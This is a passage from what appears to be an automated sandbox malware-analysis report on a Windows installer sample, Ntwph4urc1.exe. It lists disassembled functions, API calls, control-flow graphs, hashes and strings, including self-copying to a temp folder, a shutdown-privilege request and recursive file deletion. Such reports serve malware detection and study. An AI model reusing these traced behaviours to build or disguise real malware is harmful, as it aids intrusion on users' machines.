                                            • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,0040A26C,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Ntwph4urc1.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403859
                                            • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Ntwph4urc1.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403864
                                            • lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Ntwph4urc1.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403870
                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040388C
                                            • DeleteFileW.KERNEL32(0079F708,0079F708,?,007A9000,00000009,?,00000007,00000009,0000000B), ref: 004038E6
                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\Ntwph4urc1.exe,0079F708,00000001,?,00000007,00000009,0000000B), ref: 004038FA
                                            • CloseHandle.KERNEL32(00000000,0079F708,0079F708,?,0079F708,00000000,?,00000007,00000009,0000000B), ref: 00403927
                                            • GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403956
                                            • OpenProcessToken.ADVAPI32(00000000), ref: 0040395D
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403972
                                            • AdjustTokenPrivileges.ADVAPI32 ref: 00403995
                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BA
                                            • ExitProcess.KERNEL32 ref: 004039DD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                            • String ID: "C:\Users\user\Desktop\Ntwph4urc1.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$C:\Users\user\Desktop$C:\Users\user\Desktop\Ntwph4urc1.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$kernel32::EnumResourceTypesA(i 0,i r8,i 0)$~nsu
                                            • API String ID: 3441113951-3355597721
                                            • Opcode ID: ef7bc40cfc21a65b5c7abadd4c778368bce5dd0c15bdea56e8fa6b9d03db3f5a
                                            • Instruction ID: d7b9bf8e5ec5db16f392776339999e6c5d6af7d7718e861a4dfbc7241a8cc938
                                            • Opcode Fuzzy Hash: ef7bc40cfc21a65b5c7abadd4c778368bce5dd0c15bdea56e8fa6b9d03db3f5a
                                            • Instruction Fuzzy Hash: 65D1F6B1200310AAD7207F659D49B2B3AACEB81749F10843FF581B62D1DB7D8A55C76E
                                            Function 00405595 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 139 405595-4055b0 140 4055b6-40567d GetDlgItem * 3 call 404379 call 404cd2 GetClientRect GetSystemMetrics SendMessageW * 2 139->140 141 40573f-405746 139->141 163 40569b-40569e 140->163 164 40567f-405699 SendMessageW * 2 140->164 143 405770-40577d 141->143 144 405748-40576a GetDlgItem CreateThread CloseHandle 141->144 146 40579b-4057a5 143->146 147 40577f-405785 143->147 144->143 151 4057a7-4057ad 146->151 152 4057fb-4057ff 146->152 149 4057c0-4057c9 call 4043ab 147->149 150 405787-405796 ShowWindow * 2 call 404379 147->150 160 4057ce-4057d2 149->160 150->146 157 4057d5-4057e5 ShowWindow 151->157 158 4057af-4057bb call 40431d 151->158 152->149 155 405801-405807 152->155 155->149 165 405809-40581c SendMessageW 155->165 161 4057f5-4057f6 call 40431d 157->161 162 4057e7-4057f0 call 405456 157->162 158->149 161->152 162->161 168 4056a0-4056ac SendMessageW 163->168 169 4056ae-4056c5 call 404344 163->169 164->163 170 405822-40584d CreatePopupMenu call 40642b AppendMenuW 165->170 171 40591e-405920 165->171 168->169 176 4056c7-4056db ShowWindow 169->176 177 4056fb-40571c GetDlgItem SendMessageW 169->177 178 405862-405877 TrackPopupMenu 170->178 179 40584f-40585f GetWindowRect 170->179 171->160 180 4056ea 176->180 181 4056dd-4056e8 ShowWindow 176->181 177->171 183 405722-40573a SendMessageW * 2 177->183 178->171 182 40587d-405894 178->182 179->178 184 4056f0-4056f6 call 404379 180->184 181->184 185 405899-4058b4 SendMessageW 182->185 183->171 184->177 185->185 186 4058b6-4058d9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 185->186 188 4058db-405902 SendMessageW 186->188 188->188 189 405904-405918 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->171
                                            APIs
                                            • GetDlgItem.USER32(?,00000403), ref: 004055F3
                                            • GetDlgItem.USER32(?,000003EE), ref: 00405602
                                            • GetClientRect.USER32(?,?), ref: 0040563F
                                            • GetSystemMetrics.USER32(00000002), ref: 00405646
                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405667
                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405678
                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040568B
                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405699
                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056AC
                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056CE
                                            • ShowWindow.USER32(?,00000008), ref: 004056E2
                                            • GetDlgItem.USER32(?,000003EC), ref: 00405703
                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405713
                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040572C
                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405738
                                            • GetDlgItem.USER32(?,000003F8), ref: 00405611
                                              • Part of subcall function 00404379: SendMessageW.USER32(00000028,?,00000001,004041A4), ref: 00404387
                                            • GetDlgItem.USER32(?,000003EC), ref: 00405755
                                            • CreateThread.KERNEL32(00000000,00000000,Function_00005529,00000000), ref: 00405763
                                            • CloseHandle.KERNELBASE(00000000), ref: 0040576A
                                            • ShowWindow.USER32(00000000), ref: 0040578E
                                            • ShowWindow.USER32(?,00000008), ref: 00405793
                                            • ShowWindow.USER32(00000008), ref: 004057DD
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405811
                                            • CreatePopupMenu.USER32 ref: 00405822
                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405836
                                            • GetWindowRect.USER32(?,?), ref: 00405856
                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040586F
                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A7
                                            • OpenClipboard.USER32(00000000), ref: 004058B7
                                            • EmptyClipboard.USER32 ref: 004058BD
                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C9
                                            • GlobalLock.KERNEL32(00000000), ref: 004058D3
                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E7
                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405907
                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405912
                                            • CloseClipboard.USER32 ref: 00405918
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                            • String ID: {
                                            • API String ID: 590372296-366298937
                                            • Opcode ID: 76257269951a7008dfdc90867c28ba5585546a04cccc1881335d18026b5b47bc
                                            • Instruction ID: ce320b3aa05de7a86cd71a66421b7d26801e1fa413e38a053d13c4a4e4f3a794
                                            • Opcode Fuzzy Hash: 76257269951a7008dfdc90867c28ba5585546a04cccc1881335d18026b5b47bc
                                            • Instruction Fuzzy Hash: 43B15BB1900608FFDB119F64DD89EAE7B79FB44354F00802AFA45B61A0CB794E51DFA8
                                            Function 74351B5F Relevance: 20.1, APIs: 13, Instructions: 597stringlibrarymemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 7435121B: GlobalAlloc.KERNEL32(00000040,?,7435123B,?,743512DF,00000019,743511BE,-000000A0), ref: 74351225
                                            • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 74351C8D
                                            • lstrcpyW.KERNEL32(00000008,?), ref: 74351CD5
                                            • lstrcpyW.KERNEL32(00000808,?), ref: 74351CDF
                                            • GlobalFree.KERNEL32(00000000), ref: 74351CF2
                                            • GlobalFree.KERNEL32(?), ref: 74351DD4
                                            • GlobalFree.KERNEL32(?), ref: 74351DD9
                                            • GlobalFree.KERNEL32(?), ref: 74351DDE
                                            • GlobalFree.KERNEL32(00000000), ref: 74351FC8
                                            • lstrcpyW.KERNEL32(?,?), ref: 74352182
                                            • GetModuleHandleW.KERNEL32(00000008), ref: 74352201
                                            • LoadLibraryW.KERNEL32(00000008), ref: 74352212
                                            • GetProcAddress.KERNEL32(?,?), ref: 7435226C
                                            • lstrlenW.KERNEL32(00000808), ref: 74352286
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1895645572.0000000074351000.00000020.00000001.01000000.00000005.sdmp, Offset: 74350000, based on PE: true
                                            • Associated: 00000005.00000002.1895373883.0000000074350000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1896009053.0000000074354000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1896032502.0000000074356000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_74350000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                            • String ID:
                                            • API String ID: 245916457-0
                                            • Opcode ID: 4bbf7bcb0e53186155070804e7757c92c8059cbc9f59acf4f5e82077ea10780b
                                            • Instruction ID: 1e7b4f5942fdcb1fa2d70366a0b89cd025e7792d959cbdae9373451a41277746
                                            • Opcode Fuzzy Hash: 4bbf7bcb0e53186155070804e7757c92c8059cbc9f59acf4f5e82077ea10780b
                                            • Instruction Fuzzy Hash: 28226871E04609DADF119FB5C980EEEF7B9FB08315F20462ED1AAE62A0D7B457818F50
                                            Function 00405B00 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 656 405b00-405b26 call 405dcb 659 405b28-405b3a DeleteFileW 656->659 660 405b3f-405b46 656->660 661 405cbc-405cc0 659->661 662 405b48-405b4a 660->662 663 405b59-405b69 call 4063ee 660->663 664 405b50-405b53 662->664 665 405c6a-405c6f 662->665 669 405b78-405b79 call 405d0f 663->669 670 405b6b-405b76 lstrcatW 663->670 664->663 664->665 665->661 668 405c71-405c74 665->668 671 405c76-405c7c 668->671 672 405c7e-405c86 call 40674c 668->672 673 405b7e-405b82 669->673 670->673 671->661 672->661 679 405c88-405c9c call 405cc3 call 405ab8 672->679 677 405b84-405b8c 673->677 678 405b8e-405b94 lstrcatW 673->678 677->678 680 405b99-405bb5 lstrlenW FindFirstFileW 677->680 678->680 696 405cb4-405cb7 call 405456 679->696 697 405c9e-405ca1 679->697 681 405bbb-405bc3 680->681 682 405c5f-405c63 680->682 684 405be3-405bf7 call 4063ee 681->684 685 405bc5-405bcd 681->685 682->665 687 405c65 682->687 698 405bf9-405c01 684->698 699 405c0e-405c19 call 405ab8 684->699 688 405c42-405c52 FindNextFileW 685->688 689 405bcf-405bd7 685->689 687->665 688->681 695 405c58-405c59 FindClose 688->695 689->684 692 405bd9-405be1 689->692 692->684 692->688 695->682 696->661 697->671 700 405ca3-405cb2 call 405456 call 4061b4 697->700 698->688 701 405c03-405c0c call 405b00 698->701 709 405c3a-405c3d call 405456 699->709 710 405c1b-405c1e 699->710 700->661 701->688 709->688 713 405c20-405c30 call 405456 call 4061b4 710->713 714 405c32-405c38 710->714 713->688 714->688
                                            APIs
                                            • DeleteFileW.KERNELBASE(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405B29
                                            • lstrcatW.KERNEL32(007A3F50,\*.*,007A3F50,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405B71
                                            • lstrcatW.KERNEL32(?,0040A014,?,007A3F50,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405B94
                                            • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F50,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405B9A
                                            • FindFirstFileW.KERNEL32(007A3F50,?,?,?,0040A014,?,007A3F50,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405BAA
                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C4A
                                            • FindClose.KERNEL32(00000000), ref: 00405C59
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                            • String ID: "C:\Users\user\Desktop\Ntwph4urc1.exe"$C:\Users\user~1\AppData\Local\Temp\$P?z$\*.*
                                            • API String ID: 2035342205-424997647
                                            • Opcode ID: 9bcf84aa20197a85572e9300232fccf325a3569ae83ff5500f6c5511c7c60933
                                            • Instruction ID: d176cfcb2707c6ba555092c79fa60715814496245c058da0d6595325efdb1864
                                            • Opcode Fuzzy Hash: 9bcf84aa20197a85572e9300232fccf325a3569ae83ff5500f6c5511c7c60933
                                            • Instruction Fuzzy Hash: BE41D530804A15AAEB216B658D89EBF7678EF42715F14813FF801711D2DB7C5E82CE6E
                                            Function 0040674C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • FindFirstFileW.KERNELBASE(771B3420,007A4F98,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,00405E14,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405B20,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 00406757
                                            • FindClose.KERNEL32(00000000), ref: 00406763
                                            Strings
                                            • C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp, xrefs: 0040674C
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Find$CloseFileFirst
                                            • String ID: C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp
                                            • API String ID: 2295610775-3523672939
                                            • Opcode ID: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                                            • Instruction ID: 5230d556015edc92dacd95909e5542708b333c59f405b635cf09ddc887f28092
                                            • Opcode Fuzzy Hash: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                                            • Instruction Fuzzy Hash: CCD012315192205FC75027386F0C84B7A599F567353264B36F0AAF21E0C6788C3286AC
                                            Function 00403E6B Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 190 403e6b-403e7d 191 403e83-403e89 190->191 192 403fbe-403fcd 190->192 191->192 195 403e8f-403e98 191->195 193 40401c-404031 192->193 194 403fcf-404017 GetDlgItem * 2 call 404344 SetClassLongW call 40140b 192->194 199 404071-404076 call 404390 193->199 200 404033-404036 193->200 194->193 196 403e9a-403ea7 SetWindowPos 195->196 197 403ead-403eb0 195->197 196->197 201 403eb2-403ec4 ShowWindow 197->201 202 403eca-403ed0 197->202 212 40407b-404096 199->212 204 404038-404043 call 401389 200->204 205 404069-40406b 200->205 201->202 207 403ed2-403ee7 DestroyWindow 202->207 208 403eec-403eef 202->208 204->205 227 404045-404064 SendMessageW 204->227 205->199 211 404311 205->211 215 4042ee-4042f4 207->215 218 403ef1-403efd SetWindowLongW 208->218 219 403f02-403f08 208->219 217 404313-40431a 211->217 213 404098-40409a call 40140b 212->213 214 40409f-4040a5 212->214 213->214 223 4040ab-4040b6 214->223 224 4042cf-4042e8 DestroyWindow EndDialog 214->224 215->211 222 4042f6-4042fc 215->222 218->217 225 403fab-403fb9 call 4043ab 219->225 226 403f0e-403f1f GetDlgItem 219->226 222->211 228 4042fe-404307 ShowWindow 222->228 223->224 229 4040bc-404109 call 40642b call 404344 * 3 GetDlgItem 223->229 224->215 225->217 230 403f21-403f38 SendMessageW IsWindowEnabled 226->230 231 403f3e-403f41 226->231 227->217 228->211 260 404113-40414f ShowWindow KiUserCallbackDispatcher call 404366 EnableWindow 229->260 261 40410b-404110 229->261 230->211 230->231 234 403f43-403f44 231->234 235 403f46-403f49 231->235 238 403f74-403f79 call 40431d 234->238 239 403f57-403f5c 235->239 240 403f4b-403f51 235->240 238->225 241 403f92-403fa5 SendMessageW 239->241 242 403f5e-403f64 239->242 240->241 245 403f53-403f55 240->245 241->225 246 403f66-403f6c call 40140b 242->246 247 403f7b-403f84 call 40140b 242->247 245->238 256 403f72 246->256 247->225 257 403f86-403f90 247->257 256->238 257->256 264 404151-404152 260->264 265 404154 260->265 261->260 266 404156-404184 GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404186-404197 SendMessageW 266->267 268 404199 266->268 269 40419f-4041de call 404379 call 403e4c call 4063ee lstrlenW call 40642b SetWindowTextW call 401389 267->269 268->269 269->212 280 4041e4-4041e6 269->280 280->212 281 4041ec-4041f0 280->281 282 4041f2-4041f8 281->282 283 40420f-404223 DestroyWindow 281->283 282->211 284 4041fe-404204 282->284 283->215 285 404229-404256 CreateDialogParamW 283->285 284->212 286 40420a 284->286 285->215 287 40425c-4042b3 call 404344 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->287 286->211 287->211 292 4042b5-4042c8 ShowWindow call 404390 287->292 294 4042cd 292->294 294->215
                                            APIs
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EA7
                                            • ShowWindow.USER32(?), ref: 00403EC4
                                            • DestroyWindow.USER32 ref: 00403ED8
                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EF4
                                            • GetDlgItem.USER32(?,?), ref: 00403F15
                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F29
                                            • IsWindowEnabled.USER32(00000000), ref: 00403F30
                                            • GetDlgItem.USER32(?,00000001), ref: 00403FDE
                                            • GetDlgItem.USER32(?,00000002), ref: 00403FE8
                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00404002
                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404053
                                            • GetDlgItem.USER32(?,00000003), ref: 004040F9
                                            • ShowWindow.USER32(00000000,?), ref: 0040411A
                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040412C
                                            • EnableWindow.USER32(?,?), ref: 00404147
                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040415D
                                            • EnableMenuItem.USER32(00000000), ref: 00404164
                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040417C
                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040418F
                                            • lstrlenW.KERNEL32(007A1F48,?,007A1F48,00000000), ref: 004041B9
                                            • SetWindowTextW.USER32(?,007A1F48), ref: 004041CD
                                            • ShowWindow.USER32(?,0000000A), ref: 00404301
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
